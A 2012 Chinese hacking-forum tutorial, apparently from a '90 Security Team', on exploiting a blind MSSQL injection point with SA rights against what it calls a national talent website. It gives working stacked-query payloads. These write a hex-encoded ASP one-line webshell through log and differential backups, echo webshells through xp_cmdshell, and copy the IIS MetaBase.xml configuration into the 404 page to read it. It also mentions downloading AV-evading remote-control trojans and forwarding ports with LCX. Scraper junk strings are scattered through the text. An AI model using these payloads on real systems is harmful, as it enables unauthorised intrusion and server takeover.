找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2178|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
# W- w' Z  S# Z0 V+ P- m) K
2 p# b8 Q8 a4 B1 i  M9 [, F
7 i" T0 T3 D+ ]8 ]                                                             欢迎高手访问指导,欢迎新手朋友交流学习。' B1 P) ^1 l, O% X4 l9 h4 j2 I
/ Y- K( I3 x# X* H& f1 D
                                                                 7 W! C: w/ i/ W' q  Z
                                                                 ) o- r6 q+ p0 o7 w
                                                                  论坛: http://www.90team.net/
' d  U& l/ Y8 b$ S1 S% r
/ ~# v* d* j5 K6 @& P/ A
1 @8 j' H4 y# w% V5 o2 _+ ~/ O+ d' ?* S
友情检测国家人才网# H) J6 a9 P( P' M' L
; Y4 R# r, F1 z; j% Z

; H7 d' Y- ^. W7 b! z: R内容:MSSQL注入SA权限不显错模式下的入侵
) n3 h( s) f; i. p( ^) o3 R4 n; n0 ^

: P. u  [9 O' g% }4 ^5 o一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。, g0 v0 [0 |* k7 P0 N
2 G( _5 r) [& X* U) x: m
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
8 q1 i, i/ F5 P# S# e+ ~- v! }, Z1 ?( {& i, _7 d5 s

  x5 ^2 b  X. R' x# X/ d3 `& e) i0 N这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。' V5 F+ F! L3 M+ ]. {2 ~! I

' p0 w, m& g9 g# ?思路:
) e8 Q9 G2 @8 f1 g' N# q. q, z3 k5 N' U& w& R0 o) ]
首先:  O+ h+ @$ k. T7 M# _+ o' E

* {& O; @) j- W* ^通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
! d9 {2 a& d2 u* E( [6 h( F& l! q" ^
1.日志备份获得Webshell
" b2 ?- ]! s0 m1 P8 {( {
0 [5 g* c0 r$ B# X- x1 h6 T2.数据库差异备份获得Webshell
1 Q6 x0 c# {6 _8 b/ \! Q
; R; L6 ~4 R) O( D* \: O4 K4.直接下载免杀远控木马。( o3 Z! }" G6 w. e

* B+ K+ x0 A& T9 J7 L, z# H4 s8 ~5.直接下载LCX将服务器端口转发出来( W6 J' m/ U1 b8 V
6 j7 |' |( b  @
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
- |6 C# k# Q) S1 N9 J; K; a* g- d% K
! D( X) }/ x9 I! z7 \4 S
, c% D/ U7 o, k5 W) {6 \) v" w8 V/ b7 O
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
2 S& r, ]- R4 C% I) Y$ d3 P  ^0 U! ?. z9 L) y" c
我直接演示后面一个方法; Q. ~& M" a( F  ]$ u

( a3 M, Y# i' `; e5 u5 G% ]8 x. V, q9 l1 @% ]
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL + f. L8 K6 _( g# W( H
) n! C) S, n! _* _1 X3 S, y
9 F5 Y( Q2 U- ]3 d

$ u. d9 O7 R9 `* p  U; E2 l0 {
: {1 p7 A& H( q0 t" c◆日志备份:
5 n( E; J5 ^, {) Q5 \, o$ r. J1 g' n& h
7 f/ n; i6 l3 D  c8 @
1. 进行初始备份, x, {1 R) }& Z& t
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--8 C3 ]# b9 `# H/ f6 f$ R8 I! L

) c) ?4 \; x: p0 [8 p, j6 }3 z2. 插入数据5 ]& ?4 x1 ~4 `9 ]
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--) A6 t# O; s' ?. j. }0 F8 w

  _7 W$ ~6 R% t+ N: \0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
+ G! h0 e) O5 W  
( {5 D1 U1 B% c2 R8 g( Y( s3. 备份并获得文件,删除临时表
' j8 y: m& J  t& ~;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--3 T* D$ V6 h2 K/ C
/ V1 ]7 _# u! p: j
1 Z. t/ g2 c" V6 m- `

" U) b8 u0 a8 d+ ]: P% X* R  H% S◆数据库差异备份- R3 |6 e; K' H9 g4 T5 ]+ q

" s# d* A; f( L/ A+ O(1. 进行差异备份准备工作
' U' v5 N9 s5 J# U7 E
$ f) A: d2 I5 z6 M' Y;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
, Z' H' P1 F, }: E2 I0 O# I, z
  Z: h5 S( a" D8 S! n上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码( X5 r/ |& S# L, ?
$ m  Q2 Y+ E$ O+ e3 H8 y
) k" v5 S/ Y$ f# o5 W. ^4 }/ p3 Z
(2. 将数据写入到数据库# ^* r5 n& D; l; b! p  X' m1 h4 q
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- + @6 u) `  L9 g( e
- T3 G- I5 M7 S; U+ R) K
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
( K' v8 P8 W( c1 D6 ?$ `% r% r- h0 B
3. 备份数据库并清理临时文件
: K3 D+ @" r+ u$ a4 q9 x9 y( s
. w  `' J1 `3 H- B4 R% \( H/ ]( W;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
6 l( _6 f1 O! n& e! {' k
7 ]+ w: b1 U$ M$ |8 Y% d0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
! R3 Y, u/ E6 S$ S& j3 A
& g3 a; f# r4 {7 k5 A. Y( H
8 h' X2 u: r8 Z
6 p. @; ^( A/ V" R" t用^转义字符来写ASP(一句话木马)文件的方法:   4 |/ C3 g4 \4 @: [% c- C- x

" W1 `0 Q; h9 P1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
6 Y! D6 _9 M# w5 V, u/ b9 J# p4 o9 o, X8 e6 [) O
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp + `7 a2 k- l6 k( H
0 M" M$ p6 h4 v1 @( Y
读取IIS配置信息获取web路径
' s1 i& T8 h5 ?" m% E+ ?# R5 \
% j9 v, X5 x$ ~2 e6 ~# \6 I     
' x5 k/ c4 A. P8 l1 Q     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--( s. f6 a6 b4 e8 V' F
5 s$ c9 g5 c9 ?2 j3 t
执行命令
) w$ A0 z; ~7 T9 Z2 i( S     
, `6 _" c5 [+ ?8 b. D/ F     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
$ j1 m; i: I% b/ \, M
; \; f# Q2 `  I/ c# o  D- S* X7 H+ L* R6 e9 j! u

2 e3 p8 u" p$ C5 j$ g. {, v! y2 P7 {8 z5 e4 N
. C( y# O6 {4 \- y) o- T- i; N

2 J' L" C( }/ ]6 E( S3 a& G& p; x# p7 S. f  F/ ]% Y7 y
. n' P/ K) x, t. W) [

7 G  D2 d, e" N, }& g+ }: t
$ Z) }0 \3 y/ j3 j4 ~
, C: |2 {4 c% m  K- W1 W, R5 U+ J8 |/ M4 {" e2 \2 k+ K! f4 l
1 |# u8 C% |; \" W: A$ J

& \# W+ v6 t7 X; O! b  K( t0 U7 ~, C  J+ u

( Z9 O; l. q* }" t& Z: F
+ {1 k6 i* z* A7 d7 l% d$ e( Z6 Q' `$ f1 n/ P* j. [, I: L
$ _8 b$ s& b1 G4 Y

2 e9 k1 l* R$ M" h# Y6 q, Y7 P8 \% g- f& F
# N+ H! q, c' P, Y  W) d6 ^- O
& J7 L. {( z$ v& c* D7 g2 c

0 L2 t. G# m4 z) B8 @) P
+ j8 D$ w/ @- A
) T3 a1 q# v" z! N  o
4 w' Q' C: A4 M( j* v- u5 ^. K: s* h9 j# e$ W; f
9 ~* \  a2 K/ X- G. W4 g
( d% z. p% z3 t) B

7 x1 p. ^; I! o& g4 Q
4 M( `7 h; U; F
7 |. ^. i8 `7 h
. b; c! C8 _, a  ~+ D. s' O% B: x, X# G2 T+ P. q

+ K, ]9 L& b/ m- {. }3 g& H
' f* B+ q( `8 M8 V% u; U! K0 ?* R0 r; F' q7 U: `
& Z4 E: K# o/ x

% B4 n7 f$ {. p
2 A- T- N/ F$ P& g; `4 W
: @( l6 \/ x/ l! o6 D# k
( d. j9 Y, n8 g% Z
! ]1 |; g$ b$ F5 {3 ^* H
9 N2 z9 z) Q- k# \3 B# \3 r- x8 O+ h
7 k; P1 h7 I7 s; k$ z# G
3 |. d( x& c& Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表